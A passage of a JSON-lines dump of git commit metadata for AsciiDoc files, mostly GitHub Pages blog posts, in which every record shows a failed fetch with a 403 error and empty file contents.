 unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"306b2247a1fe8557690a36a8021a7361ef150859","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6eb1bea6405daef49e1d9e41a13f07cc3ba36d5","subject":"Update 2018-03-13-Link-On-Line.adoc","message":"Update 2018-03-13-Link-On-Line.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-13-Link-On-Line.adoc","new_file":"_posts\/2018-03-13-Link-On-Line.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb029b61a3fab737456753975e6920b6d94e45b4","subject":"Update 2018-09-06-failure.adoc","message":"Update 2018-09-06-failure.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-06-failure.adoc","new_file":"_posts\/2018-09-06-failure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a17bd9c00c628dadf1e6e5eb16b890b026a98e8c","subject":"Fixed some asciidoc","message":"Fixed some asciidoc\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7c29914f2d386c7a1e928345582b661b5a7cdca","subject":"added cloud and container tidbits","message":"added cloud and container tidbits\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"interests.adoc","new_file":"interests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4d566e32fabdb27343267ba18124ce0e2dd7011","subject":"Update 2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83249edb7e33d460b6d2e2935988a14291004294","subject":"JavaScript release documentation","message":"JavaScript release documentation\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/release.adoc","new_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/canoo\/dolphin-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03ea53e2d0b6030e751d3841efa86ae5ed78fe16","subject":"Added README","message":"Added README\n","repos":"kalon33\/libfitbit,Br3nda\/libfitbit,openyou\/libfitbit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kalon33\/libfitbit.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"9d5c66b0476fb93479a3bea6472b9629c1471ea5","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b53c9fb3773dcc855a8299f8679f895efedfb1db","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59cec1533d3f0218feb803602ff81139807e0e97","subject":"Update 2017-04-14-First-things-first.adoc","message":"Update 2017-04-14-First-things-first.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-04-14-First-things-first.adoc","new_file":"_posts\/2017-04-14-First-things-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a3cb9e69a96d21de8cc79c8cbc2aeca2907ddcb","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c3b2ee9876da3cdd08b561553ef32970590eb11","subject":"add etiquette page","message":"add etiquette page\n","repos":"clojure\/clojure-site","old_file":"content\/community\/etiquette.adoc","new_file":"content\/community\/etiquette.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ec1434e88394b1477306163558b11625acd3d0cf","subject":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","message":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e9563fcf63107e5000d5c1cada481991f2b9af9","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dabb66f9df0ed7b755ebf11af67ed657389c28e","subject":"Update 2015-09-24-Back-to-Basic.adoc","message":"Update 2015-09-24-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-24-Back-to-Basic.adoc","new_file":"_posts\/2015-09-24-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fed282f834408c4282a48829765005f98357c431","subject":"Update 2016-07-24-Report-attack-tracepcap.adoc","message":"Update 2016-07-24-Report-attack-tracepcap.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-07-24-Report-attack-tracepcap.adoc","new_file":"_posts\/2016-07-24-Report-attack-tracepcap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"149b6480851ffdb0d58dab32cd9df422c63dea04","subject":"Publish 2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-Package-Messages-FAILED-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2dadb72644346458a24a22d46ec94fc052b21fb","subject":"Update 2015-06-03-impression-of-HubPress-after-first-press.adoc","message":"Update 2015-06-03-impression-of-HubPress-after-first-press.adoc","repos":"vvani06\/hubpress-test,vvani06\/hubpress-test,vvani06\/hubpress-test","old_file":"_posts\/2015-06-03-impression-of-HubPress-after-first-press.adoc","new_file":"_posts\/2015-06-03-impression-of-HubPress-after-first-press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vvani06\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f08d0a7ceff955c097a086ae5b310ef2789ac5db","subject":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","message":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b8553d98b39f262e5f4c42c34dbd70926f1cdc1","subject":"Update 2016-04-25-Microservice-with-a-Websocket-transport.adoc","message":"Update 2016-04-25-Microservice-with-a-Websocket-transport.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-25-Microservice-with-a-Websocket-transport.adoc","new_file":"_posts\/2016-04-25-Microservice-with-a-Websocket-transport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a8112fd3c6dc90c1d47b5950ca0f800efaf52cb","subject":"y2b create post Unlock Any MacBook Without The Password","message":"y2b create post Unlock Any MacBook Without The Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-29-Unlock-Any-MacBook-Without-The-Password.adoc","new_file":"_posts\/2017-11-29-Unlock-Any-MacBook-Without-The-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a52d94b8cc4c9509bce2ae42034ad4257ccbae60","subject":"y2b create post Would You Put This On Your Phone?","message":"y2b create post Would You Put This On Your Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-02-Would-You-Put-This-On-Your-Phone.adoc","new_file":"_posts\/2017-07-02-Would-You-Put-This-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"616e37891ae7a8635531dd897f10fcb7e88d913d","subject":"job #11491 added review minutes doc","message":"job #11491 added review minutes doc\n","repos":"travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/review-minutes\/11491_mcs_rvm.adoc","new_file":"doc-bridgepoint\/review-minutes\/11491_mcs_rvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34bea9271cfe64d9dd97b91c22712c8f9fab4d3a","subject":"Scaling alerting intro post (#185)","message":"Scaling alerting intro post (#185)\n\n","repos":"pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/scaling-hawkular-alerting.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/scaling-hawkular-alerting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b64758cf84e51eed5c3af1632d1f0ed63d624b5","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf1a9a163379c1306f5ac03315a99c903072eb5c","subject":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","message":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"160206e1f974ddaca5d25ab53adcb7a6851fa4c6","subject":"Update 2015-09-20-Python-naing-conventions-for-underscores.adoc","message":"Update 2015-09-20-Python-naing-conventions-for-underscores.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-naing-conventions-for-underscores.adoc","new_file":"_posts\/2015-09-20-Python-naing-conventions-for-underscores.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"124cbcfe7b792a5219d66a4582c7f263b64ac6be","subject":"Apply basic spelling fixes","message":"Apply basic spelling fixes\n\nDo a basic spelling check to fix mispelled words\n","repos":"funcool\/lentes","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/lentes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"413df7e62ba490d20acae7335ecefffd97887650","subject":"Update the documentation format.","message":"Update the documentation format.\n","repos":"funcool\/catacumba,funcool\/catacumba,funcool\/catacumba","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/catacumba.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2d5f3887fe5ada5aa7e6607c6077a6304e0f6af7","subject":"usage example for apoc.cypher.doIt","message":"usage example for apoc.cypher.doIt\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.doIt.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.doIt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbba2fd4774e52acd82df11dc33c770490ef64b6","subject":"y2b create post JayBird Freedom Bluetooth Headphones Unboxing \\u0026 Overview (JF3)","message":"y2b create post JayBird Freedom Bluetooth Headphones Unboxing \\u0026 Overview (JF3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-28-JayBird-Freedom-Bluetooth-Headphones-Unboxing-u0026-Overview-JF3.adoc","new_file":"_posts\/2011-08-28-JayBird-Freedom-Bluetooth-Headphones-Unboxing-u0026-Overview-JF3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b273eeae2c813e51cf8e650a9f0bee06affb0ee","subject":"docs: clean up trimix filling station example","message":"docs: clean up trimix filling station example\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/trimix-filling-station.adoc","new_file":"docs\/trimix-filling-station.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc34f40d786cfec675ff1d393279183b362ec14a","subject":"reoranizing","message":"reoranizing\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"055da90706802107aba43194bd0109333509578c","subject":"Update 2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","message":"Update 2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","new_file":"_posts\/2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88e735d78d9c7e576fec7cba68e77647a604857b","subject":"Update 2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","message":"Update 2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","new_file":"_posts\/2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab087410cc28e221829305e795688fd1372be795","subject":"Update 2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","message":"Update 2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","repos":"MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io","old_file":"_posts\/2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","new_file":"_posts\/2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MichaelIT\/MichaelIT.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21858e0e4111904b18b73d98fb815cb39ccb785c","subject":"y2b create post The Unbox Therapy Edition iPhone","message":"y2b create post The Unbox Therapy Edition iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-16-The-Unbox-Therapy-Edition-iPhone.adoc","new_file":"_posts\/2017-06-16-The-Unbox-Therapy-Edition-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"590f2e1824b56365400bdc3b0e8d861829ce0c05","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23beebf347d37bcb0a5ace3922b91f444e89b256","subject":"Update 2015-05-07-Estructuras-de-Control-If-Else-While.adoc","message":"Update 2015-05-07-Estructuras-de-Control-If-Else-While.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b03c199b6a97ee76b1dc042486707be37cde34a","subject":"Update 2015-06-04-Gliffy.adoc","message":"Update 2015-06-04-Gliffy.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-06-04-Gliffy.adoc","new_file":"_posts\/2015-06-04-Gliffy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b35debb476aeb9e93b169015959035ebecc74c6","subject":"Update 2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","message":"Update 2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","new_file":"_posts\/2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 